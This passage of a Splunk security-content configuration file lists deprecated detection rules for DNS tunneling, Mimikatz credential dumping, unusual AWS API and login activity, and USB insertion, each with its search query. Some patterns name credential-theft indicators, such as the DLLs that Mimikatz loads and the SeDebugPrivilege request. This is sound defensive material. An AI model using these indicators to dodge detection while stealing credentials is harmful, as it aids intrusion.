exfiltration, Command And Control, or evasion of security controls can often be detected by noting unusually large volumes of DNS traffic. Deprecated because this detection should focus on DNS queries instead of DNS responses. action.escu.how_to_implement = To successfully implement this search you need to ingest data from your DNS logs, or monitor DNS traffic using Stream, Bro or something similar. Specifically, this query requires that the DNS data model is populated with information regarding the DNS record type that is being returned as well as the data in the answer section of the protocol. action.escu.known_false_positives = It's possible that legitimate TXT record responses can be long enough to trigger this search. You can modify the packet threshold for this search to help mitigate false positives. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Long DNS TXT Record Response - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious DNS Traffic", "Command And Control"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Detect Long DNS TXT Record Response - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious DNS Traffic", "Command And Control"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is used to detect attempts to use DNS tunneling, by calculating the length of responses to DNS TXT queries. Endpoints using DNS as a method of transmission for data exfiltration, Command And Control, or evasion of security controls can often be detected by noting unusually large volumes of DNS traffic. Deprecated because this detection should focus on DNS queries instead of DNS responses. action.notable.param.rule_title = Detect Long DNS TXT Record Response action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Network_Resolution where DNS.message_type=response AND DNS.record_type=TXT by DNS.src DNS.dest DNS.answer DNS.record_type | `drop_dm_object_name("DNS")` | eval anslen=len(answer) | search anslen>100 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename src as "Source IP", dest as "Destination IP", answer as "DNS Answer" anslen as "Answer Length" record_type as "DNS Record Type" firstTime as "First Time" lastTime as "Last Time" count as Count | table "Source IP" "Destination IP" "DNS Answer" "DNS Record Type" "Answer Length" Count "First Time" "Last Time" | `detect_long_dns_txt_record_response_filter` [ESCU - Detect Mimikatz Using Loaded Images - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for reading loaded Images unique to credential dumping with Mimikatz. Deprecated because mimikatz libraries changed and very noisy sysmon Event Code. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search looks for reading loaded Images unique to credential dumping with Mimikatz. Deprecated because mimikatz libraries changed and very noisy sysmon Event Code. action.escu.how_to_implement = This search needs Sysmon Logs and a sysmon configuration, which includes EventCode 7 with powershell.exe. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives. action.escu.known_false_positives = Other tools can import the same DLLs. These tools should be part of a whitelist. False positives may be present with any process that authenticates or uses credentials, PowerShell included. Filter based on parent process. action.escu.creation_date = 2019-12-03 action.escu.modification_date = 2019-12-03 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Mimikatz Using Loaded Images - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Credential Dumping", "Detect Zerologon Attack", "Cloud Federated Credential Abuse", "DarkSide Ransomware", "CISA AA22-257A", "CISA AA22-264A", "CISA AA22-320A", "Sandworm Tools"] action.risk = 1 action.risk.param._risk_message = A process, $Image$, has loaded $ImageLoaded$ that are typically related to credential dumping on $dest$. Review for further details. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Detect Mimikatz Using Loaded Images - Rule action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "Detect Zerologon Attack", "Cloud Federated Credential Abuse", "DarkSide Ransomware", "CISA AA22-257A", "CISA AA22-264A", "CISA AA22-320A", "Sandworm Tools"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for reading loaded Images unique to credential dumping with Mimikatz. Deprecated because mimikatz libraries changed and very noisy sysmon Event Code. action.notable.param.rule_title = Detect Mimikatz Using Loaded Images action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=7 | stats values(ImageLoaded) as ImageLoaded values(ProcessId) as ProcessId by dest, Image | search ImageLoaded=*WinSCard.dll ImageLoaded=*cryptdll.dll ImageLoaded=*hid.dll ImageLoaded=*samlib.dll ImageLoaded=*vaultcli.dll | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_mimikatz_using_loaded_images_filter` [ESCU - Detect Mimikatz Via PowerShell And EventCode 4703 - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for PowerShell requesting privileges consistent with credential dumping. Deprecated, looks like things changed from a logging perspective. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search looks for PowerShell requesting privileges consistent with credential dumping. Deprecated, looks like things changed from a logging perspective. action.escu.how_to_implement = You must be ingesting Windows Security logs. You must also enable the account change auditing here: http://docs.splunk.com/Documentation/Splunk/7.0.2/Data/MonitorWindowseventlogdata. Additionally, this search requires you to enable your Group Management Audit Logs in your Local Windows Security Policy and to be ingesting those logs. More information on how to enable them can be found here: http://whatevernetworks.com/auditing-group-membership-changes-in-active-directory/. Finally, please make sure that the local administrator group name is "Administrators" to be able to look for the right group membership changes. action.escu.known_false_positives = The activity may be legitimate. PowerShell is often used by administrators to perform various tasks, and it's possible this event could be generated in those cases. In these cases, false positives should be fairly obvious and you may need to tweak the search to eliminate noise. action.escu.creation_date = 2019-02-27 action.escu.modification_date = 2019-02-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Mimikatz Via PowerShell And EventCode 4703 - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Cloud Federated Credential Abuse"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Detect Mimikatz Via PowerShell And EventCode 4703 - Rule action.correlationsearch.annotations = {"analytic_story": ["Cloud Federated Credential Abuse"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for PowerShell requesting privileges consistent with credential dumping. Deprecated, looks like things changed from a logging perspective. action.notable.param.rule_title = Detect Mimikatz Via PowerShell And EventCode 4703 action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` signature_id=4703 Process_Name=*powershell.exe | rex field=Message "Enabled Privileges:\s+(?\w+)\s+Disabled Privileges:" | where privs="SeDebugPrivilege" | stats count min(_time) as firstTime max(_time) as lastTime by dest, Process_Name, privs, Process_ID, Message | rename privs as "Enabled Privilege" | rename Process_Name as process | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `detect_mimikatz_via_powershell_and_eventcode_4703_filter` [ESCU - Detect new API calls from user roles - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search detects new API calls that have either never been seen before or that have not been seen in the previous hour, where the identity type is `AssumedRole`. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search detects new API calls that have either never been seen before or that have not been seen in the previous hour, where the identity type is `AssumedRole`. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. This search works best when you run the "Previously seen API call per user roles in AWS CloudTrail" support search once to create a history of previously seen user roles. action.escu.known_false_positives = It is possible that there are legitimate user roles making new or infrequently used API calls in your infrastructure, causing the search to trigger. action.escu.creation_date = 2018-04-16 action.escu.modification_date = 2018-04-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect new API calls from user roles - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS User Monitoring"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Detect new API calls from user roles - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS User Monitoring"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventType=AwsApiCall errorCode=success userIdentity.type=AssumedRole [search `cloudtrail` eventType=AwsApiCall errorCode=success userIdentity.type=AssumedRole | stats earliest(_time) as earliest latest(_time) as latest by userName eventName | inputlookup append=t previously_seen_api_calls_from_user_roles | stats min(earliest) as earliest, max(latest) as latest by userName eventName | outputlookup previously_seen_api_calls_from_user_roles| eval newApiCallfromUserRole=if(earliest>=relative_time(now(), "-70m@m"), 1, 0) | where newApiCallfromUserRole=1 | `security_content_ctime(earliest)` | `security_content_ctime(latest)` | table eventName userName] |rename userName as user| stats values(eventName) earliest(_time) as earliest latest(_time) as latest by user | `security_content_ctime(earliest)` | `security_content_ctime(latest)` | `detect_new_api_calls_from_user_roles_filter` [ESCU - Detect new user AWS Console Login - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for AWS CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert is fired if the user has logged into the console for the first time within the last hour. Deprecated now this search is updated to use the Authentication datamodel. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events wherein a console login event by a user was recorded within the last hour, then compares the event to a lookup file of previously seen users (by ARN values) who have logged into the console. The alert is fired if the user has logged into the console for the first time within the last hour. Deprecated now this search is updated to use the Authentication datamodel. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. Run the "Previously seen users in AWS CloudTrail" support search only once to create a baseline of previously seen IAM users within the last 30 days. Run "Update previously seen users in AWS CloudTrail" hourly (or more frequently depending on how often you run the detection searches) to refresh the baselines. action.escu.known_false_positives = When a legitimate new user logins for the first time, this activity will be detected. Check how old the account is and verify that the user activity is legitimate. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect new user AWS Console Login - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Suspicious AWS Login Activities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Detect new user AWS Console Login - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS Login Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=ConsoleLogin | rename userIdentity.arn as user | stats earliest(_time) as firstTime latest(_time) as lastTime by user | inputlookup append=t previously_seen_users_console_logins_cloudtrail | stats min(firstTime) as firstTime max(lastTime) as lastTime by user | eval userStatus=if(firstTime >= relative_time(now(), "-70m@m"), "First Time Logging into AWS Console","Previously Seen User") | `security_content_ctime(firstTime)`|`security_content_ctime(lastTime)`| where userStatus ="First Time Logging into AWS Console" | `detect_new_user_aws_console_login_filter` [ESCU - Detect Spike in AWS API Activity - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search will detect users creating spikes of API activity in your AWS environment. It will also update the cache file that factors in the latest data. This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search will detect users creating spikes of API activity in your AWS environment. It will also update the cache file that factors in the latest data. This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit your environment. The `dataPointThreshold` variable is the minimum number of data points required to have a statistically significant amount of data to determine. The `deviationThreshold` variable is the number of standard deviations away from the mean that the value must be to be considered a spike.\ This search produces fields (`eventName`,`numberOfApiCalls`,`uniqueApisCalled`) that are not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. These fields contribute additional context to the notable. To see the additional metadata, add the following fields, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):\\n1. **Label:** AWS Event Name, **Field:** eventName\ 1. \ 1. **Label:** Number of API Calls, **Field:** numberOfApiCalls\ 1. \ 1. **Label:** Unique API Calls, **Field:** uniqueApisCalled\ Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details` action.escu.known_false_positives = action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Spike in AWS API Activity - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS User Monitoring"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Detect Spike in AWS API Activity - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS User Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventType=AwsApiCall [search `cloudtrail` eventType=AwsApiCall | spath output=arn path=userIdentity.arn | stats count as apiCalls by arn | inputlookup api_call_by_user_baseline append=t | fields - latestCount | stats values(*) as * by arn | rename apiCalls as latestCount | eval newAvgApiCalls=avgApiCalls + (latestCount-avgApiCalls)/720 | eval newStdevApiCalls=sqrt(((pow(stdevApiCalls, 2)*719 + (latestCount-newAvgApiCalls)*(latestCount-avgApiCalls))/720)) | eval avgApiCalls=coalesce(newAvgApiCalls, avgApiCalls), stdevApiCalls=coalesce(newStdevApiCalls, stdevApiCalls), numDataPoints=if(isnull(latestCount), numDataPoints, numDataPoints+1) | table arn, latestCount, numDataPoints, avgApiCalls, stdevApiCalls | outputlookup api_call_by_user_baseline | eval dataPointThreshold = 15, deviationThreshold = 3 | eval isSpike=if((latestCount > avgApiCalls+deviationThreshold*stdevApiCalls) AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | rename arn as userIdentity.arn | table userIdentity.arn] | spath output=user userIdentity.arn | stats values(eventName) as eventName, count as numberOfApiCalls, dc(eventName) as uniqueApisCalled by user | `detect_spike_in_aws_api_activity_filter` [ESCU - Detect Spike in Network ACL Activity - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search will detect users creating spikes in API activity related to network access-control lists (ACLs)in your AWS environment. This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search will detect users creating spikes in API activity related to network access-control lists (ACLs)in your AWS environment. This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit your environment. The `dataPointThreshold` variable is the minimum number of data points required to have a statistically significant amount of data to determine. The `deviationThreshold` variable is the number of standard deviations away from the mean that the value must be to be considered a spike. This search works best when you run the "Baseline of Network ACL Activity by ARN" support search once to create a lookup file of previously seen Network ACL Activity. To add or remove API event names related to network ACLs, edit the macro `network_acl_events`. action.escu.known_false_positives = The false-positive rate may vary based on the values of`dataPointThreshold` and `deviationThreshold`. Please modify this according the your environment. action.escu.creation_date = 2018-05-21 action.escu.modification_date = 2018-05-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Spike in Network ACL Activity - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Network ACL Activity"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Detect Spike in Network ACL Activity - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Network ACL Activity"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` `network_acl_events` [search `cloudtrail` `network_acl_events` | spath output=arn path=userIdentity.arn | stats count as apiCalls by arn | inputlookup network_acl_activity_baseline append=t | fields - latestCount | stats values(*) as * by arn | rename apiCalls as latestCount | eval newAvgApiCalls=avgApiCalls + (latestCount-avgApiCalls)/720 | eval newStdevApiCalls=sqrt(((pow(stdevApiCalls, 2)*719 + (latestCount-newAvgApiCalls)*(latestCount-avgApiCalls))/720)) | eval avgApiCalls=coalesce(newAvgApiCalls, avgApiCalls), stdevApiCalls=coalesce(newStdevApiCalls, stdevApiCalls), numDataPoints=if(isnull(latestCount), numDataPoints, numDataPoints+1) | table arn, latestCount, numDataPoints, avgApiCalls, stdevApiCalls | outputlookup network_acl_activity_baseline | eval dataPointThreshold = 15, deviationThreshold = 3 | eval isSpike=if((latestCount > avgApiCalls+deviationThreshold*stdevApiCalls) AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | rename arn as userIdentity.arn | table userIdentity.arn] | spath output=user userIdentity.arn | stats values(eventName) as eventNames, count as numberOfApiCalls, dc(eventName) as uniqueApisCalled by user | `detect_spike_in_network_acl_activity_filter` [ESCU - Detect Spike in Security Group Activity - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search will detect users creating spikes in API activity related to security groups in your AWS environment. It will also update the cache file that factors in the latest data. This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search will detect users creating spikes in API activity related to security groups in your AWS environment. It will also update the cache file that factors in the latest data. This search is deprecated and have been translated to use the latest Change Datamodel. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit your environment. The `dataPointThreshold` variable is the minimum number of data points required to have a statistically significant amount of data to determine. The `deviationThreshold` variable is the number of standard deviations away from the mean that the value must be to be considered a spike.This search works best when you run the "Baseline of Security Group Activity by ARN" support search once to create a history of previously seen Security Group Activity. To add or remove API event names for security groups, edit the macro `security_group_api_calls`. action.escu.known_false_positives = Based on the values of`dataPointThreshold` and `deviationThreshold`, the false positive rate may vary. Please modify this according the your environment. action.escu.creation_date = 2018-04-18 action.escu.modification_date = 2018-04-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Spike in Security Group Activity - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS User Monitoring"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Detect Spike in Security Group Activity - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS User Monitoring"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` `security_group_api_calls` [search `cloudtrail` `security_group_api_calls` | spath output=arn path=userIdentity.arn | stats count as apiCalls by arn | inputlookup security_group_activity_baseline append=t | fields - latestCount | stats values(*) as * by arn | rename apiCalls as latestCount | eval newAvgApiCalls=avgApiCalls + (latestCount-avgApiCalls)/720 | eval newStdevApiCalls=sqrt(((pow(stdevApiCalls, 2)*719 + (latestCount-newAvgApiCalls)*(latestCount-avgApiCalls))/720)) | eval avgApiCalls=coalesce(newAvgApiCalls, avgApiCalls), stdevApiCalls=coalesce(newStdevApiCalls, stdevApiCalls), numDataPoints=if(isnull(latestCount), numDataPoints, numDataPoints+1) | table arn, latestCount, numDataPoints, avgApiCalls, stdevApiCalls | outputlookup security_group_activity_baseline | eval dataPointThreshold = 15, deviationThreshold = 3 | eval isSpike=if((latestCount > avgApiCalls+deviationThreshold*stdevApiCalls) AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | rename arn as userIdentity.arn | table userIdentity.arn] | spath output=user userIdentity.arn | stats values(eventName) as eventNames, count as numberOfApiCalls, dc(eventName) as uniqueApisCalled by user | `detect_spike_in_security_group_activity_filter` [ESCU - Detect USB device insertion - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. The search is used to detect hosts that generate Windows Event ID 4663 for successful attempts to write to or read from a removable storage and Event ID 4656 for failures, which occurs when a USB drive is plugged in. In this scenario we are querying the Change_Analysis data model to look for Windows Event ID 4656 or 4663 where the priority of the affected host is marked as high in the ES Assets and Identity Framework. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.CM"]} action.escu.data_models = ["Change", "Change_Analysis"] action.escu.eli5 = The search is used to detect hosts that generate Windows Event ID 4663 for successful attempts to write to or read from a removable storage and Event ID 4656 for failures, which occurs when a USB drive is plugged in. In this scenario we are querying the Change_Analysis data model to look for Windows Event ID 4656 or 4663 where the priority of the affected host is marked as high in the ES Assets and Identity Framework. action.escu.how_to_implement = To successfully implement this search, you must ingest Windows Security Event logs and track event code 4663 and 4656. Ensure that the field from the event logs is being mapped to the result_id field in the Change_Analysis data model. To minimize the alert volume, this search leverages the Assets and Identity framework to filter out events from those assets not marked high priority in the Enterprise Security Assets and Identity Framework. action.escu.known_false_positives = Legitimate USB activity will also be detected. Please verify and investigate as appropriate. action.escu.creation_date = 2017-11-27 action.escu.modification_date = 2017-11-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect USB device insertion - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Data Protection"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Detect USB device insertion - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Protection"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search is used to detect hosts that generate Windows Event ID 4663 for successful attempts to write to or read from a removable storage and Event ID 4656 for failures, which occurs when a USB drive is plugged in. In this scenario we are querying the Change_Analysis data model to look for Windows Event ID 4656 or 4663 where the priority of the affected host is marked as high in the ES Assets and Identity Framework. action.notable.param.rule_title = Detect USB device insertion action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count earliest(_time) AS earliest latest(_time) AS latest from datamodel=Change_Analysis where (nodename = All_Changes) All_Changes.result="Removable Storage device" (All_Changes.result_id=4663 OR All_Changes.result_id=4656) (All_Changes.src_priority=high) by All_Changes.dest | `drop_dm_object_name("All_Changes")`| `security_content_ctime(earliest)`| `security_content_ctime(latest)` | `detect_usb_device_insertion_filter` [ESCU - Detect web traffic to dynamic domain providers - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has 